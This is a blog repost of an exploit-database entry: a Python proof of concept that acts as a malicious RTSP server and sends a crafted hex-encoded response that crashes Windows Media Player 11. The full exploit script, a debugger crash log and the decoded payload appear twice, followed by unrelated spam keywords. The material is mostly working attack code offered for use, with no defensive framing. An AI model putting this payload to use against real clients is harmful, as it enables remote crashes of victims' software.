Sunday, December 25, 2011

[dos / poc] - Windows Media Player v11.0.5721.5262 Remote Denial Of Service

Windows Media Player v11.0.5721.5262 Remote Denial Of Service | Inj3ct0r - exploit database : vulnerability : 0day : shellcode
import socket, binascii
 print "\n" 
 print "----------------------------------------------------------------"
 print "|      WMP11 Remote Null Pointer                                |"
 print "|      Level, Smash the Stack                                   |"
 print "|      Windows XP SP3 x86, Windows Media Player v11.0.5721.5262 |"
 print "|      Windows 7 SP2 x64, Windows Media Player v11.0.5721.5262  |"
 print "----------------------------------------------------------------"
 print "\n"
 print "Attack URL: mms://127.0.0.1/Sample_Broadcast\n\n"
 HOST = "127.0.0.1"
 PORT = 554
 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 s.bind((HOST, PORT))
 s.listen(1)
 buf = [
 ("525453502f312e3020323038204f4b0d0a436f6e74656e742d547970653a206170706c696361746"
 "96f6e2f7364700d0a566172793a204163636570740d0a582d506c61796c6973742d47656e2d49643"
 "a203137360d0a582d42726f6164636173742d49643a20300d0a436f6e74656e742d4c656e6774683"
 "a203837390d0a446174653a2053756e2c203038204d617920323031312031353a32343a333320474"
 "d540d0a435365713a20310d0a5365727665723a20574d5365727665722f392e312e312e333834310"
 "d0a537570706f727465643a20636f6d2e6d6963726f736f66742e776d2e73727670706169722c206"
 "36f6d2e6d6963726f736f66742e776d2e737377697463682c20636f6d2e6d6963726f736f66742e7"
 "76d2e656f736d73672c20636f6d2e6d6963726f736f66742e776d2e6661737463616368652c20636"
 "f6d2e6d6963726f736f66742e776d2e7061636b657470616972737372632c20636f6d2e6d6963726"
 "f736f66742e776d2e7374617274757070726f66696c650d0a4c6173742d4d6f6469666965643a205"
 "361742c2031372046656220323030372031333a31343a303420474d540d0a457461673a202231363"
 "8220d0a43616368652d436f6e74726f6c3a206d61782d6167653d38363339392c20782d776d732d7"
 "3747265616d2d747970653d2262726f6164636173742c20706c61796c697374222c206d7573742d7"
 "26576616c69646174652c20707269766174652c20782d776d732d70726f78792d73706c69740d0a0"
 "d0a763d306f3d2d20323031313035303831343339313330343036203230313130353038313433393"
 "1333034303620494e20495034203132372e302e302e310d0a733d3c4e6f205469746c653e633d494"
 "e2049503420302e302e302e30623d52523a30613d70676d70753a646174613a6170706c696361746"
 "96f6e2f766e642e6d732e776d732d6864722e61736676313b6261736536342c4d4361796459356d7"
 "a78476d3251437141474c4f624e4142414141414141414142674141414145436f6479726a4565707"
 "a78474f35414441444342545a5767414141414141414141414141414141414141414141414141414"
 "1414141414c784141414141414141414141414141414141414141664141414141414141414843677"
 "7676b4141414141764d6e50435141414141433546514141414141414141414141414147416741414"
 "26749414145673741414331413739664c716e504559376a414d414d49464e6c4c674141414141414"
 "141415230744f7275716e504559376d414d414d49464e6c42674141414141416b516663743765707"
 "a78474f35674441444342545a566f414141414141414141414f4562746b35627a78476f2f5143415"
 "83178454b7742582b794256573838527150304167463963524373414141414141414141414177414"
 "1414141414141414151414141414141514145414150414141414141414141416b516663743765707"
 "a78474f35674441444342545a5849414141414141414141514a35702b4531627a78476f2f5143415"
 "83178454b31444e77372b50596338526937494171674330346941414141414141414141414277414"
 "1414149414141414167414141414141595145424145416641414151414141414151415141416f414"
 "143494141434141414141414141455141424141415141417a6e5834653431473052474e676742676"
 "c386d69736959414141414141414141416741424145673741414143414567374141417a4a724a316"
 "a6d62504561625a414b6f41597335734b67414141414141414141434141494141674143414141414"
 "141414141414141414141324a724a316a6d62504561625a414b6f415973357337443441414141414"
 "1414141414141414141414141414141414141414141414148774141414141414141414241513d3d7"
 "43d3020300d0a6d3d617564696f2030205254502f415650203936613d72656c6961626c650d0a0d0"
 "a0d0a")
 ]
 while True:
 conn, addr = s.accept()
 print "-----Request From Client-----\n"
 print conn.recv(1024)
 print "-----Request From Client-----\n"
 print "-----Response From Server-----\n"
 print binascii.unhexlify(buf[0])
 print "-----Response From Server-----\n"
 conn.send(binascii.unhexlify(buf[0]))
 conn.close()
 s.close()
  
 #CRASH
 #(ae8.5b8): Access violation - code c0000005 (first chance)
 #First chance exceptions are reported before any exception handling.
 #This exception may be expected and handled.
 #eax=00000000 ebx=02ba4df8 ecx=00000000 edx=02b5c688 esi=013acff8 edi=00000000
 #eip=128cd479 esp=02ebfb64 ebp=02ebfeec iopl=0         nv up ei pl zr na pe nc
 #cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
 #*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\system32\wmnetmgr.dll -
 #wmnetmgr!DllUnregisterServer+0x76320:
 #128cd479 8bb914010000    mov     edi,dword ptr [ecx+114h] ds:0023:00000114=????????
 #0:021> g
 #(ae8.5b8): Access violation - code c0000005 (!!! second chance !!!)
 #eax=00000000 ebx=02ba4df8 ecx=00000000 edx=02b5c688 esi=013acff8 edi=00000000
 #eip=128cd479 esp=02ebfb64 ebp=02ebfeec iopl=0         nv up ei pl zr na pe nc
 #cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
 #wmnetmgr!DllUnregisterServer+0x76320:
 #128cd479 8bb914010000    mov     edi,dword ptr [ecx+114h] ds:0023:00000114=????????
  
 #PAYLOAD#
 #RTSP/1.0 208 OK
 #Content-Type: application/sdp
 #Vary: Accept
 #X-Playlist-Gen-Id: 176
 #X-Broadcast-Id: 0
 #Content-Length: 879
 #Date: Sun, 08 May 2011 15:24:33 GMT
 #CSeq: 1
 #Server: WMServer/9.1.1.3841
 #Supported: com.microsoft.wm.srvppair, com.microsoft.wm.sswitch, com.microsoft.wm.eosmsg, com.microsoft.wm.fastcache, com.microsoft.wm.packetpairssrc, com.microsoft.wm.startupprofile
 #Last-Modified: Sat, 17 Feb 2007 13:14:04 GMT
 #Etag: "168"
 #Cache-Control: max-age=86399, x-wms-stream-type="broadcast, playlist", must-revalidate, private, x-wms-proxy-split
 #v=0o=- 201105081439130406 201105081439130406 IN IP4 127.0.0.1
 #s=<No Title>c=IN IP4 0.0.0.0b=RR:0a=pgmpu:data:application/vnd.ms.wms-hdr.asfv1;base64,MCaydY5mzxGm2QCqAGLObNABAAAAAAAABgAAAAECodyrjEepzxGO5ADADC
 #BTZWgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALxAAAAAAAAAAAAAAAAAAAAfAAAAAAAAAHCgwgkAAAAAvM
 #nPCQAAAAC5FQAAAAAAAAAAAAAGAgAABgIAAEg7AAC1A79fLqnPEY7jAMAMIFNlLgAAAAAAAAAR0tOruq
 #nPEY7mAMAMIFNlBgAAAAAAkQfct7epzxGO5gDADCBTZVoAAAAAAAAAAOEbtk5bzxGo/QCAX1xEKwBX+y
 #BVW88RqP0AgF9cRCsAAAAAAAAAAAwAAAAAAAAAAQAAAAAAQAEAAPAAAAAAAAAAkQfct7epzxGO5gDADC
 #BTZXIAAAAAAAAAQJ5p+E1bzxGo/QCAX1xEK1DNw7+PYc8Ri7IAqgC04iAAAAAAAAAAABwAAAAIAAAAAg
 #AAAAAAYQEBAEAfAAAQAAAAAQAQAAoAACIAACAAAAAAAAEQABAAAQAAznX4e41G0RGNggBgl8misiYAAA
 #AAAAAAAgABAEg7AAACAEg7AAAzJrJ1jmbPEabZAKoAYs5sKgAAAAAAAAACAAIAAgACAAAAAAAAAAAAAA
 #A2JrJ1jmbPEabZAKoAYs5s7D4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAHwAAAAAAAAABAQ==t=0 0m=audio 0 RTP/AVP 96a=reliable
 
 
 
  # 1337day.com [2011-12-24]
Windows Media Player v11.0.5721.5262 Remote Denial Of Service | Inj3ct0r - exploit database : vulnerability : 0day : shellcode
import socket, binascii
 print "\n" 
 print "----------------------------------------------------------------"
 print "|      WMP11 Remote Null Pointer                                |"
 print "|      Level, Smash the Stack                                   |"
 print "|      Windows XP SP3 x86, Windows Media Player v11.0.5721.5262 |"
 print "|      Windows 7 SP2 x64, Windows Media Player v11.0.5721.5262  |"
 print "----------------------------------------------------------------"
 print "\n"
 print "Attack URL: mms://127.0.0.1/Sample_Broadcast\n\n"
 HOST = "127.0.0.1"
 PORT = 554
 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 s.bind((HOST, PORT))
 s.listen(1)
 buf = [
 ("525453502f312e3020323038204f4b0d0a436f6e74656e742d547970653a206170706c696361746"
 "96f6e2f7364700d0a566172793a204163636570740d0a582d506c61796c6973742d47656e2d49643"
 "a203137360d0a582d42726f6164636173742d49643a20300d0a436f6e74656e742d4c656e6774683"
 "a203837390d0a446174653a2053756e2c203038204d617920323031312031353a32343a333320474"
 "d540d0a435365713a20310d0a5365727665723a20574d5365727665722f392e312e312e333834310"
 "d0a537570706f727465643a20636f6d2e6d6963726f736f66742e776d2e73727670706169722c206"
 "36f6d2e6d6963726f736f66742e776d2e737377697463682c20636f6d2e6d6963726f736f66742e7"
 "76d2e656f736d73672c20636f6d2e6d6963726f736f66742e776d2e6661737463616368652c20636"
 "f6d2e6d6963726f736f66742e776d2e7061636b657470616972737372632c20636f6d2e6d6963726"
 "f736f66742e776d2e7374617274757070726f66696c650d0a4c6173742d4d6f6469666965643a205"
 "361742c2031372046656220323030372031333a31343a303420474d540d0a457461673a202231363"
 "8220d0a43616368652d436f6e74726f6c3a206d61782d6167653d38363339392c20782d776d732d7"
 "3747265616d2d747970653d2262726f6164636173742c20706c61796c697374222c206d7573742d7"
 "26576616c69646174652c20707269766174652c20782d776d732d70726f78792d73706c69740d0a0"
 "d0a763d306f3d2d20323031313035303831343339313330343036203230313130353038313433393"
 "1333034303620494e20495034203132372e302e302e310d0a733d3c4e6f205469746c653e633d494"
 "e2049503420302e302e302e30623d52523a30613d70676d70753a646174613a6170706c696361746"
 "96f6e2f766e642e6d732e776d732d6864722e61736676313b6261736536342c4d4361796459356d7"
 "a78476d3251437141474c4f624e4142414141414141414142674141414145436f6479726a4565707"
 "a78474f35414441444342545a5767414141414141414141414141414141414141414141414141414"
 "1414141414c784141414141414141414141414141414141414141664141414141414141414843677"
 "7676b4141414141764d6e50435141414141433546514141414141414141414141414147416741414"
 "26749414145673741414331413739664c716e504559376a414d414d49464e6c4c674141414141414"
 "141415230744f7275716e504559376d414d414d49464e6c42674141414141416b516663743765707"
 "a78474f35674441444342545a566f414141414141414141414f4562746b35627a78476f2f5143415"
 "83178454b7742582b794256573838527150304167463963524373414141414141414141414177414"
 "1414141414141414151414141414141514145414150414141414141414141416b516663743765707"
 "a78474f35674441444342545a5849414141414141414141514a35702b4531627a78476f2f5143415"
 "83178454b31444e77372b50596338526937494171674330346941414141414141414141414277414"
 "1414149414141414167414141414141595145424145416641414151414141414151415141416f414"
 "143494141434141414141414141455141424141415141417a6e5834653431473052474e676742676"
 "c386d69736959414141414141414141416741424145673741414143414567374141417a4a724a316"
 "a6d62504561625a414b6f41597335734b67414141414141414141434141494141674143414141414"
 "141414141414141414141324a724a316a6d62504561625a414b6f415973357337443441414141414"
 "1414141414141414141414141414141414141414141414148774141414141414141414241513d3d7"
 "43d3020300d0a6d3d617564696f2030205254502f415650203936613d72656c6961626c650d0a0d0"
 "a0d0a")
 ]
 while True:
 conn, addr = s.accept()
 print "-----Request From Client-----\n"
 print conn.recv(1024)
 print "-----Request From Client-----\n"
 print "-----Response From Server-----\n"
 print binascii.unhexlify(buf[0])
 print "-----Response From Server-----\n"
 conn.send(binascii.unhexlify(buf[0]))
 conn.close()
 s.close()
  
 #CRASH
 #(ae8.5b8): Access violation - code c0000005 (first chance)
 #First chance exceptions are reported before any exception handling.
 #This exception may be expected and handled.
 #eax=00000000 ebx=02ba4df8 ecx=00000000 edx=02b5c688 esi=013acff8 edi=00000000
 #eip=128cd479 esp=02ebfb64 ebp=02ebfeec iopl=0         nv up ei pl zr na pe nc
 #cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
 #*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\system32\wmnetmgr.dll -
 #wmnetmgr!DllUnregisterServer+0x76320:
 #128cd479 8bb914010000    mov     edi,dword ptr [ecx+114h] ds:0023:00000114=????????
 #0:021> g
 #(ae8.5b8): Access violation - code c0000005 (!!! second chance !!!)
 #eax=00000000 ebx=02ba4df8 ecx=00000000 edx=02b5c688 esi=013acff8 edi=00000000
 #eip=128cd479 esp=02ebfb64 ebp=02ebfeec iopl=0         nv up ei pl zr na pe nc
 #cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
 #wmnetmgr!DllUnregisterServer+0x76320:
 #128cd479 8bb914010000    mov     edi,dword ptr [ecx+114h] ds:0023:00000114=????????
  
 #PAYLOAD#
 #RTSP/1.0 208 OK
 #Content-Type: application/sdp
 #Vary: Accept
 #X-Playlist-Gen-Id: 176
 #X-Broadcast-Id: 0
 #Content-Length: 879
 #Date: Sun, 08 May 2011 15:24:33 GMT
 #CSeq: 1
 #Server: WMServer/9.1.1.3841
 #Supported: com.microsoft.wm.srvppair, com.microsoft.wm.sswitch, com.microsoft.wm.eosmsg, com.microsoft.wm.fastcache, com.microsoft.wm.packetpairssrc, com.microsoft.wm.startupprofile
 #Last-Modified: Sat, 17 Feb 2007 13:14:04 GMT
 #Etag: "168"
 #Cache-Control: max-age=86399, x-wms-stream-type="broadcast, playlist", must-revalidate, private, x-wms-proxy-split
 #v=0o=- 201105081439130406 201105081439130406 IN IP4 127.0.0.1
 #s=<No Title>c=IN IP4 0.0.0.0b=RR:0a=pgmpu:data:application/vnd.ms.wms-hdr.asfv1;base64,MCaydY5mzxGm2QCqAGLObNABAAAAAAAABgAAAAECodyrjEepzxGO5ADADC
 #BTZWgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALxAAAAAAAAAAAAAAAAAAAAfAAAAAAAAAHCgwgkAAAAAvM
 #nPCQAAAAC5FQAAAAAAAAAAAAAGAgAABgIAAEg7AAC1A79fLqnPEY7jAMAMIFNlLgAAAAAAAAAR0tOruq
 #nPEY7mAMAMIFNlBgAAAAAAkQfct7epzxGO5gDADCBTZVoAAAAAAAAAAOEbtk5bzxGo/QCAX1xEKwBX+y
 #BVW88RqP0AgF9cRCsAAAAAAAAAAAwAAAAAAAAAAQAAAAAAQAEAAPAAAAAAAAAAkQfct7epzxGO5gDADC
 #BTZXIAAAAAAAAAQJ5p+E1bzxGo/QCAX1xEK1DNw7+PYc8Ri7IAqgC04iAAAAAAAAAAABwAAAAIAAAAAg
 #AAAAAAYQEBAEAfAAAQAAAAAQAQAAoAACIAACAAAAAAAAEQABAAAQAAznX4e41G0RGNggBgl8misiYAAA
 #AAAAAAAgABAEg7AAACAEg7AAAzJrJ1jmbPEabZAKoAYs5sKgAAAAAAAAACAAIAAgACAAAAAAAAAAAAAA
 #A2JrJ1jmbPEabZAKoAYs5s7D4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAHwAAAAAAAAABAQ==t=0 0m=audio 0 RTP/AVP 96a=reliable
 
 
 
  # 1337day.com [2011-12-24]

Source: http://www.1337day.com/exploits/17302

kindle fire update college board pasco county rooney mara solstice x factor results x factor results

No comments:

Post a Comment

Note: Only a member of this blog may post a comment.